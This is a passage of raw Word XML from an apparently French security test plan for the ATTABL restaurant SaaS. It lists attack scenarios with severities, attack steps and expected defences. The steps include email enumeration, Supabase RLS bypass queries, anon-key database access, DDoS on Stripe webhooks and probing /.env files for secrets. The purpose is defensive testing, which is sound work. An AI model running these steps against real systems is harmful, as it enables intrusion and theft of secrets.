    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Le formulaire se soumet automatiquement</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Les Server Actions Next.js incluent un token CSRF automatique. SameSite=Lax sur les cookies empeche l'envoi du cookie depuis un domaine tiers.</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src/app/actions/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/supabase/server.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-19 : Fuite d'emails via les invitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="228B22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">BASSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant utilise le systeme d'invitation pour verifier si un email existe.</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Envoyer POST /api/invitations avec un email cible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Observer la reponse : "Invitation envoyee" vs "Cet email a deja un compte"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Utiliser pour enumerer les emails des utilisateurs ATTABL</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La reponse doit etre identique dans les 2 cas. Pas de distinction entre email existant et inexistant.</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src/app/api/invitations/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-20 : Token d'invitation expose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="228B22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">BASSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Les tokens d'invitation sont visibles dans les reponses API.</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Creer une invitation via le dashboard admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Intercepter la reponse API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Verifier si le token d'invitation est present dans la reponse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Si oui : un attaquant ayant acces au reseau peut voler l'invitation</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 code supprime deja le champ token avant de retourner la reponse (strip du token). Verifier que c'est bien le cas.</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src/app/api/invitations/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Scenarios Base de donnees (Supabase/PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-21 : Bypass RLS (Row Level Security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifier que le RLS ne peut pas etre contourne pour acceder aux donnees d'autres tenants.</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Se connecter avec le anon key (cle publique Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Tenter une requete directe : supabase.from("tenants").select("*")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tenter : supabase.from("menu_items").select("*").eq("tenant_id", "autre-tenant-id")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter : supabase.from("orders").select("*") sans filtre tenant_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Verifier que le RLS est actif sur TOUTES les tables multi-tenant</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 RLS bloque toute requete qui ne correspond pas au tenant de l'utilisateur connecte. La requete retourne un resultat vide (pas une erreur) - c'est le comportement Supabase standard.</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Supabase Dashboard &gt; Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/supabase/client.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-22 : Acces direct a la base via anon key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant utilise la cle anon (visible dans le code client) pour interroger la base directement.</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Extraire NEXT_PUBLIC_SUPABASE_URL et NEXT_PUBLIC_SUPABASE_ANON_KEY du code source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Utiliser le SDK Supabase dans un script externe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tenter des SELECT, INSERT, UPDATE, DELETE sur toutes les tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter de creer un nouvel utilisateur admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter d'acceder a la table admin_users avec is_super_admin = true</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La cle anon ne donne acces qu'aux donnees autorisees par le RLS. Sans authentification, seules les donnees publiques (menus) sont accessibles. Les tables sensibles (admin_users, orders, settings) sont protegees.</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Supabase RLS policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/supabase/client.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-23 : Data exfiltration via les menus publics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un concurrent scrape tous les menus et prix de tous les restaurants ATTABL.</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Scanner les sous-domaines ATTABL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Pour chaque tenant actif, scraper le menu public (GET /sites/{slug}/menu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Collecter les noms de plats, descriptions, prix, photos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Construire une base de donnees concurrentielle</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Les menus publics sont accessibles par design (c'est le QR code). Le rate limiting attenuer le scraping massif. Pour aller plus loin : Cloudflare Bot Protection ou verification Turnstile.</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src/app/sites/[site]/page.tsx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/rate-limit.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Scenarios Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-24 : DDoS sur l'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Attaque par deni de service distribue sur le SaaS.</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Envoyer des milliers de requetes simultanees sur attabl.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Cibler les endpoints lourds (recherche, analytics, export)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Cibler les webhooks Stripe (pour bloquer les paiements)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier la resilience de Vercel Edge Network</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Vercel inclut une protection DDoS de base. Le rate limiting Upstash protege les endpoints. Pour les gros volumes : activer Vercel Firewall ou Cloudflare en frontal.</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Vercel Dashboard &gt; Firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/rate-limit.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-25 : Exposition des variables d'environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Les secrets serveur sont exposes via une misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Etapes d'attaque :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Acceder a /.env, /.env.local, /.env.production depuis le navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Acceder a /api/.env ou /api/config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Inspecter les headers de reponse pour des fuites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier que les variables NEXT_PUBLIC_ ne contiennent pas de secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Verifier le code source JS bundle pour des cles privees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
